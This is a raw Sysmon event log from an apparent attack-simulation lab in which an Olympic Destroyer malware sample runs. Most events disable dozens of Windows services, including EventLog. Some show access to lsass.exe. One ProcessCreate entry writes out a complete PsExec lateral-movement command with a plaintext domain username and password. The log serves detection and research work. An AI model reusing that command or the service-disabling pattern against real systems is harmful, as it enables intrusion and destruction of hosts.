10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaStorV\ImagePath\SystemRoot\System32\drivers\iaStorV.sys 12241200x8000000000000000290514Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaStorV\StartOverride 13241300x8000000000000000290513Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaStorV\StartDWORD (0x00000004) 13241300x8000000000000000290512Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaStorAV\ImagePath\SystemRoot\System32\drivers\iaStorAV.sys 12241200x8000000000000000290511Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaStorAV\StartOverride 10341000x8000000000000000290510Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290509Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaStorAV\StartDWORD (0x00000004) 10341000x8000000000000000290508Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-F11D-6215-0B00-000000003802}628824C:\Windows\system32\lsass.exe{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290507Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.829{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaLPSSi_I2C\StartDWORD (0x00000004) 10341000x8000000000000000290506Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290505Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.829{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290504Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\iaLPSSi_GPIO\StartDWORD (0x00000004) 13241300x8000000000000000290503Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\i8042prt\StartDWORD (0x00000004) 13241300x8000000000000000290502Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HyperVideo\StartDWORD (0x00000004) 13241300x8000000000000000290501Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\hyperkbd\StartDWORD (0x00000004) 13241300x8000000000000000290500Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\hwpolicy\ImagePath\SystemRoot\System32\drivers\hwpolicy.sys 13241300x8000000000000000290499Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\hwpolicy\StartDWORD (0x00000004) 13241300x8000000000000000290498Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\hvservice\StartDWORD (0x00000004) 10341000x8000000000000000290497Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.813{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 13241300x8000000000000000290496Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HvHost\StartDWORD (0x00000004) 13241300x8000000000000000290495Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HTTP\StartDWORD (0x00000004) 13241300x8000000000000000290494Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HpSAMD\ImagePath\SystemRoot\System32\drivers\HpSAMD.sys 12241200x8000000000000000290493Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HpSAMD\StartOverride 13241300x8000000000000000290492Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HpSAMD\StartDWORD (0x00000004) 13241300x8000000000000000290491Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HidUsb\StartDWORD (0x00000004) 13241300x8000000000000000290490Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:56:42.813{C8EA50B7-12EA-6216-6305-000000003802}1840C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000290489Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\hidserv\StartDWORD (0x00000004) 13241300x8000000000000000290488Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\hidinterrupt\StartDWORD (0x00000004) 23542300x8000000000000000290487Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.813{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7AB93598F0ED971DC9111D5F61362C59,SHA256=D380EE077A783345A07453D69054895E585CA4F78724C16CEA9BCF612B8810FC,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000290486Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HidBth\StartDWORD (0x00000004) 10341000x8000000000000000290485Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.813{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000290484Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.816{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000290483Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.813{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6605-000000003802}1956C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290482Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HidBatt\StartDWORD (0x00000004) 13241300x8000000000000000290481Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\HDAudBus\StartDWORD (0x00000004) 13241300x8000000000000000290480Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.813{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\GpuEnergyDrv\StartDWORD (0x00000004) 13241300x8000000000000000290479Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\GPIOClx0101\StartDWORD (0x00000004) 13241300x8000000000000000290478Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\genericusbfn\StartDWORD (0x00000004) 13241300x8000000000000000290477Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\gencounter\StartDWORD (0x00000004) 13241300x8000000000000000290476Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FsDepends\StartDWORD (0x00000004) 13241300x8000000000000000290475Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FrameServer\StartDWORD (0x00000004) 13241300x8000000000000000290474Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FontCache\StartDWORD (0x00000004) 13241300x8000000000000000290473Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FltMgr\ImagePath\SystemRoot\system32\drivers\fltmgr.sys 13241300x8000000000000000290472Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FltMgr\StartDWORD (0x00000004) 13241300x8000000000000000290471Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\flpydisk\StartDWORD (0x00000004) 13241300x8000000000000000290470Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Filetrace\StartDWORD (0x00000004) 13241300x8000000000000000290469Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FileInfo\StartDWORD (0x00000004) 13241300x8000000000000000290468Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FileCrypt\StartDWORD (0x00000004) 13241300x8000000000000000290467Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\FDResPub\StartDWORD (0x00000004) 13241300x8000000000000000290466Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\fdPHost\StartDWORD (0x00000004) 13241300x8000000000000000290465Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.798{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\fdc\StartDWORD (0x00000004) 13241300x8000000000000000290464Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\fcvsc\StartDWORD (0x00000004) 13241300x8000000000000000290463Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\fastfat\StartDWORD (0x00000004) 13241300x8000000000000000290462Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\exfat\StartDWORD (0x00000004) 13241300x8000000000000000290461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EventSystem\StartDWORD (0x00000004) 13241300x8000000000000000290460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EventLog\StartDWORD (0x00000004) 13241300x8000000000000000290459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ErrDev\StartDWORD (0x00000004) 13241300x8000000000000000290458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ena\StartDWORD (0x00000004) 13241300x8000000000000000290457Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\elxstor\ImagePath\SystemRoot\System32\drivers\elxstor.sys 12241200x8000000000000000290456Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\elxstor\StartOverride 13241300x8000000000000000290455Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\elxstor\StartDWORD (0x00000004) 13241300x8000000000000000290454Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\elxfcoe\ImagePath\SystemRoot\System32\drivers\elxfcoe.sys 12241200x8000000000000000290453Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\elxfcoe\StartOverride 13241300x8000000000000000290452Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\elxfcoe\StartDWORD (0x00000004) 13241300x8000000000000000290451Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EhStorTcgDrv\ImagePath\SystemRoot\System32\drivers\EhStorTcgDrv.sys 12241200x8000000000000000290450Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EhStorTcgDrv\StartOverride 13241300x8000000000000000290449Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EhStorTcgDrv\StartDWORD (0x00000004) 13241300x8000000000000000290448Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EhStorClass\ImagePath\SystemRoot\System32\drivers\EhStorClass.sys 13241300x8000000000000000290447Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\EhStorClass\StartDWORD (0x00000004) 13241300x8000000000000000290446Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ec2winutildriver\ImagePath\SystemRoot\System32\drivers\EC2WinUtilDriver.sys 13241300x8000000000000000290445Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.782{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ec2winutildriver\StartDWORD (0x00000004) 13241300x8000000000000000290444Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 